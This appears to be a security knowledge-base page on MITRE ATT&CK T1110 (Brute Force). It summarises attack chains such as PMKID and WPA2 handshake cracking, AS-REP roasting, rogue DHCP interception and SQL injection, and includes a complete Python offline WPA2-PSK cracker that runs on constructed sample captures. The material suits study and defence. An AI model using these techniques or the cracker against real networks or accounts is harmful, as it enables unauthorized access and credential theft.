Brute Force
Guess credentials via repeated authentication attempts.
§ Where this technique fits
T1110 is catalogued under the Credential Access tactic of MITRE ATT&CK. It appears in 7 approved dossiers in the registry, at step 4.6 on average.
Authoritative reference: attack.mitre.org/techniques/T1110/.
§ Dossiers chaining this technique
- step 3 / 5
PMKID attack → offline crack with no client interaction
WPA2 PMKID can be extracted from a single association attempt with the AP, with no client present: the AP returns it in the RSN IE of the first EAPOL frame. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak. Not every AP includes a PMKID (it depends on PMK caching support), so fall back to a 4-way handshake capture when none is returned.
- step 3 / 8
AS-REP roast → cracked user → Kerberoast → service-account admin
Anonymous attacker recovers a user password via AS-REP roasting, authenticates, kerberoasts a service account with weak password, and lands on a high-value server.
- step 4 / 6
WPA2-PSK handshake capture + crack → LAN access
Deauth a connected client to force re-association, capture the 4-way handshake with airodump-ng, convert the capture with hcxpcapngtool, and crack the PSK offline with hashcat -m 22000.
- step 4 / 6
RODC compromise → cracked NT hashes of revealed accounts
A Read-Only Domain Controller stores password material only for principals on its msDS-RevealedList. Compromising the RODC + cracking those hashes gives you the corresponding users.
- step 5 / 5
Rogue DHCP → DNS poisoning → MITM
Bring up a faster DHCP server on the segment; new clients get attacker as gateway + DNS — strip HTTPS, capture creds, inject payloads.
- step 6 / 8
SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
- step 7 / 7
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
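The PMKID and 4-way-handshake dossiers above both end in the same offline step: derive the PMK from each candidate passphrase and check it against what was captured. The following is an added example, not code from the page or from hashcat/hcxtools, showing what hashcat -m 22000 actually verifies for both line types (01 = PMKID, 02 = EAPOL MIC). The ESSID, MAC addresses, nonces and the "password123" PSK are constructed sample data, not a real capture; the EAPOL frame is built by hand in the M2 layout hcxpcapngtool writes (MIC field zeroed). AES-CMAC (key descriptor version 3) is left out.

```python
"""Offline WPA2-PSK verification for hashcat 22000 lines (added example)."""
import hashlib
import hmac


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the expensive step; everything after it is a cheap HMAC.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); the AP leaks this in M1.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes, length: int = 64) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(PMK, label || 0x00 || Min(AA,SPA) || Max(AA,SPA)
    # || Min(ANonce,SNonce) || Max(ANonce,SNonce) || i), concatenated until 64 bytes.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes, key_ver: int) -> bytes:
    # Key Descriptor Version 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP).
    if key_ver == 1:
        return hmac.new(kck, eapol_zeroed_mic, hashlib.md5).digest()
    if key_ver == 2:
        return hmac.new(kck, eapol_zeroed_mic, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % key_ver)


def parse_22000(line: str) -> dict:
    # WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_CLIENT*ESSID_hex*ANONCE*EAPOL*MESSAGEPAIR
    f = line.strip().split("*")
    if len(f) < 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a WPA 22000 line")
    return {"type": f[1], "tag": bytes.fromhex(f[2]), "ap": bytes.fromhex(f[3]),
            "sta": bytes.fromhex(f[4]), "essid": bytes.fromhex(f[5]),
            "anonce": bytes.fromhex(f[6]), "eapol": bytes.fromhex(f[7])}


def candidate_matches(h: dict, passphrase: str) -> bool:
    pmk = derive_pmk(passphrase, h["essid"])
    if h["type"] == "01":
        return derive_pmkid(pmk, h["ap"], h["sta"]) == h["tag"]
    # EAPOL-Key frame: key info at offset 5 (version = low 3 bits), nonce at 17..49.
    key_ver = int.from_bytes(h["eapol"][5:7], "big") & 0x7
    snonce = h["eapol"][17:49]
    kck = derive_ptk(pmk, h["ap"], h["sta"], h["anonce"], snonce)[:16]
    return eapol_mic(kck, h["eapol"], key_ver) == h["tag"]


def crack(line: str, wordlist) -> "str | None":
    h = parse_22000(line)
    for word in wordlist:
        if candidate_matches(h, word):
            return word
    return None


# --- Constructed sample capture (not a real network); PSK chosen so the result is checkable.
ESSID = b"CorpGuest"
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("66778899aabb")
_pmk = derive_pmk("password123", ESSID)
SAMPLE_PMKID_LINE = "*".join(["WPA", "01", derive_pmkid(_pmk, AP, STA).hex(),
                              AP.hex(), STA.hex(), ESSID.hex(), "", "", ""])

# Hand-built EAPOL M2: header(4) desc(1) keyinfo(2) keylen(2) replay(8) nonce(32)
# IV(16) RSC(8) ID(8) MIC(16, zeroed) keydatalen(2) = 99 bytes, body length 0x5f.
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
_eapol = (bytes.fromhex("0203005f02") + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8
          + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
_mic = eapol_mic(derive_ptk(_pmk, AP, STA, ANONCE, SNONCE)[:16], _eapol, 2)
SAMPLE_EAPOL_LINE = "*".join(["WPA", "02", _mic.hex(), AP.hex(), STA.hex(),
                              ESSID.hex(), ANONCE.hex(), _eapol.hex(), "02"])

WORDLIST = ["letmein", "Welcome1", "password123", "summer2024"]

if __name__ == "__main__":
    print("PMKID line ->", crack(SAMPLE_PMKID_LINE, WORDLIST))
    print("EAPOL line ->", crack(SAMPLE_EAPOL_LINE, WORDLIST))
```

The point to take away is that both captures reduce to the same PBKDF2 work per candidate (4096 SHA-1 rounds, salted with the SSID), which is why a PSK that survives a wordlist plus rules is safe regardless of which capture method was used, and why the PMKID route matters operationally only because it removes the need for a client.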
§ What commonly comes next
- Valid Accounts (T1078 · Initial Access), seen 6×